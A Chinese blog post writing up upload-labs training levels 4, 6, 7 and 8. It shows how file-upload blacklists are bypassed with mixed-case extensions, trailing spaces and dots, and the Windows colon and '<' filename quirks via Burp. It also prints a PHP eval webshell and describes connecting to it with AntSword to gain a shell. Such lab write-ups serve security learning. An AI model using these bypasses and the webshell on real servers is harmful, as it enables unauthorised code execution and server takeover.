渗透测试-文件上传之大小写和window特性绕过(三)

已于 2023-01-20 10:45:15 修改
阅读量3k 收藏 3
点赞数 2
分类专栏: 渗透测试 文章标签: 测试工具 运维开发
于 2022-04-16 16:06:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124213671
版权

文件上传之大小写和window特性绕过

文件上传upload-labs实验室第6,7,8关

前言

一、什么是window特性

window特性就是window对于文件的后缀名自动的修改,例如空格和点,冒号后面的内容都省略掉,可以利用window特性进行绕过。

二、大小写和window特性绕过

1.大小写绕过

第六关没有限制大小写,可以进行大小写绕过
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
上传文件zhi.PhP
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16上传成功。
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload/202204160654088873.PhP
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

这里补充关卡四,实验还有另一个方法,也可以行的通就是利用window特性冒号进行绕过。
第一步
上传58.jpg文件
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
第二步
用burp抓包,修改后缀名,修改为58.php:.jpg重发
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
修改成功,成功上传58.php文件,将58.php:.jpg解析成.php文件,冒号后面的内容都会省略掉,会生成.php文件
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_14,color_FFFFFF,t_70,g_se,x_16
在burp上再修改为58.<进行重发
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
再查看文件大小,原来上传的时候是0kb,再上传是大小增加了
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_17,color_FFFFFF,t_70,g_se,x_16
打开文件查看,里面存在一句话木马

<?php @eval($_POST['chopper']); ?>

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
复制网址上传到蚁剑进行连接
http://192.168.222.4/upload/upload/58.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

关卡四的实验原理很简单,利用window和php环境的叠加特性,以下符号在正则匹配时的相等性:
双引号’’ = 点号.
大于符号> = 问号?
小于符号< = 星号*

上面则是用了<号,再次上传58.<,重写58.php内容,webshell代码就会写入原来的空文件中。

2.利用空格和点绕过

接下来进行第七关
看一下源代码,发现没有限制空格
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
利用空格进行绕过,在window中,空格会自动省略
上传zhi.PhP文件,进行抓包修改文件后缀名
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
在zhi.PhP后面加上空格和点
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
找到路径
…/upload/202204160636393878.php
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload//202204160748393371.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

第八关
查看源码可知没有限制点,利用点进行绕过
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
上传58.jpg文件,进行抓包修改为58.php.
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
复制网址到蚁剑连接
http://192.168.222.4/upload/upload/58.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center
连接成功,成功拿到shell。

总结

本次实验是对文件上传漏洞进一步提升练习,学会了window特性方法的绕过,介绍了几种常用的绕过方法。

炫彩@之星
关注
专栏目录
28-1 文件上传漏洞 - Windows文件绕过
weixin_43263566的博客
03-19 256
环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客定义:限制条件:利用文件流藏文件方法: 查看隐藏的数据 解释:在 Windows 系统中,如果你输入 这样的命令,实际上会打开记事本(Notepad),并尝试打开名为 的文件。在 Windows 中,冒号(:)通常用于指定文件流(ADS),但记事本不支持直接打开文件流。 这些方法可以利用Windows文件绕过::SDATA特性,在同一个文件中隐藏其他文件内容或数据。
文件上传漏洞基础/htaccess重写解析绕过/大小写绕过上传/windows特性绕过
ChenD的学习笔记
10-22 3969
htaccess文件可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能!有的黑名单没有对后缀名大小写进行严格判断(一般不会有),导致可以更改后缀大小写绕过,如PHP、Php、pHp、PhP、pHP....Windows中后缀名.,系统会自动忽略末尾的".",所以可以通过在末尾加.来进行绕过。到这里我们能发现,前面的代码没有一行是没用的,每一行都针对一种上传方法!
文件上传绕过】七、利用Windows特性加点绕过
ssrf
10-10 1994
文章目录一、后端代码过滤不严格二、源码绕过 一、后端代码过滤不严格 黑名单,但是没有对后缀名进行去”.”处理,利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过: 二、源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4","
文件上传漏洞(基于upload-labs靶场)针对Windows系统特性绕过
Welcome To Myon'Blog !
12-19 1502
我再强调一遍,关于文件上传漏洞的题,绝大多数情况下我们是无法知道后端源码的,只有每个方向慢慢尝试,并不是说看到就知道要用什么方法,都是不断换方向试出来的。 这里要使用的是空格绕过,那么它基于的原理就是: Windows系统对于文件的重命名会自动把空格给去掉 (这里如果直接在上传时添加空格是不行的) 所以我们需要进行抓包,然后在抓到的数据包中将文件名后缀加上空格,即可实现绕过
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 3962
文件上传绕过总结;编辑器文件上传渗透测试记录
SQL注入---大小写绕过
qq_41179687的博客
03-26 786
WEB安全篇 SQL注入绕过技术 02 大小写转换 NULL值 N值 双引号 十六进制绕过注入 1、大小写转换 select * from users where id=1 Union sEleCT 1,2,3,4; 在less中测试 内容被过滤 空格被过滤掉 用%0a替换空格,空格未被过滤 爆出账号密码 http://192.168.50.185:7766/Less-27/?id=9999%27%0AUniOn%0ASelecT%0A1,(SelecT%0Agroup_
渗透测试-文件上传
SK1ng的博客
09-25 728
文件上传 文件上传漏洞 服务器配置不当,导致任意文件上传 Web应用开启文件上传功能,但没有对文件进行足够的限制 危害 该漏洞可导致攻击者上传任意文件,包括恶意脚本、程序等。如果Web服务器所保存上传文件的可写目录具有执行权限,则可以上传后门文件getshell 条件 Web服务器开启上传功能,且接口对外开放 Web用户对目标目录具有可写权限,甚至执行权限 Web中间件可以解析上传的脚本 验证/绕过 前端验证 JS类防护 如: <script type="text/javascript"&g
渗透测试 2 --- XSS、CSRF、文件上传文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3240
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
渗透测试-内网信息收集
cdyunaq的博客
04-28 3333
1 收集本机信息 1.1 手动收集信息 查询网络配置信息 ipconfig /all 查询操作系统和版本信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查询系统体系结构 echo %PROCESSOR_ARCHITECTURE% 查看安装的软件及版本、路径等 wmic product get name,version 利用PowerS
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5810
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
【漏洞挖掘】——79、黑名单检测绕过
最新发布
Fly_鹏程万里
06-12 102
window下如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名,最终的目的就是不检查文件名。
文件上传绕过
qq_45557130的博客
10-13 4324
文件上传绕过
【漏洞发现-xss跨站脚本攻击】大小写绕过
m0_46344990的博客
05-20 674
一、漏洞描述 xss跨站脚本攻击是黑客通过“html注入”篡改了网页,插入了js恶意脚本,前端渲染时进行恶意代码执行,从而控制用户浏览的一种攻击。经常出现在需要用户输入的地方,一旦对输入不进行处理,就会发生网页被篡改。 分为类 反射型:经过后端,不经过数据库 存储型:经过后端,经过数据库 DOM型:不经过后端,是基于文档对象型的一种漏洞,dom-xss是通过url参数去控制触发的 在xss靶场第六关服务器采用了替换恶意关键字的方式防御,但是为对输入进行小写转化,可采用大小写绕过...
后缀名检测与绕过大小写绕过
m0_73720136的博客
05-06 330
掌握文件上传的服务端检测中的后缀名检测原理以及通过大小写的转换来绕过后缀名的检测。
文件上传常用绕过方式
weixin_43077878的博客
04-02 3706
1.前端。
文件上传绕过方法总结(入门必看)
qq_65165505的博客
05-13 3529
常见文件上传绕过方法的总结
文件上传漏洞
m0_72324809的博客
05-01 319
攻击者通过上传恶意文件传递给解释器去执行,然后就可以在服务器上执行恶意代码,进行数据库执行,服务器文件管理,命令执行等恶意操作,从而控制整个网站,甚至是服务器,这个恶意的文件 包括( php ,asp ,aspx ,jsp等)又被称WebShell。Apache解析有一个特点,解析文件时是从右往左判断,如果为不可识别解析再往左判断,如aa.php.owf.rar文件,Apache不可识别解析 ‘.owf’和‘.rar’这两种后缀,会解析成.php文件。方法:在本地浏览器客户端禁用JS即可;
文件上传检测与绕过——服务器检测与绕过
weixin_54055099的博客
09-22 1524
服务器检测与绕过后缀名绕过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值